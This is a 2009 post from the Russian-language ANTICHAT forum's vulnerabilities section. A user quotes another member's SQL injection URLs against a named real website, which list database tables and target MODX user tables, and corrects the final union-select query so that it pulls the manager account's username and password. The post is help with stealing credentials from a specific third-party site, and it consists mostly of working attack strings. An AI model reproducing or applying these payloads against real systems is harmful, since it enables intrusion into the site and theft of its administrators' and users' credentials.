ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.08.2009, 19:40
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от lucky_guy  
короче, есть бажный сайт:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/*
в нем столько табличек:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+informati on_schema.tables+limit+86,1/*
самые интересные это:
modx_active_users -тридцатая
modx_manager_users -37
modx_web_users -66
из них получаем столбцы:
username
password
но когда я хочу просмотреть эти столбцы вводя например вот это:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_man ager_users+limit+1,1/*
то никакого имени и пароля не получается!
может я не так что-то делаю, помогите кто может.
т к в таблице modx_manager_users всего одна запись, то поэтому limit+1,1 ничего не выводит.

c limit+0,1 всё нормально:
Код:
http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_manager_users+limit+0,1/*
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.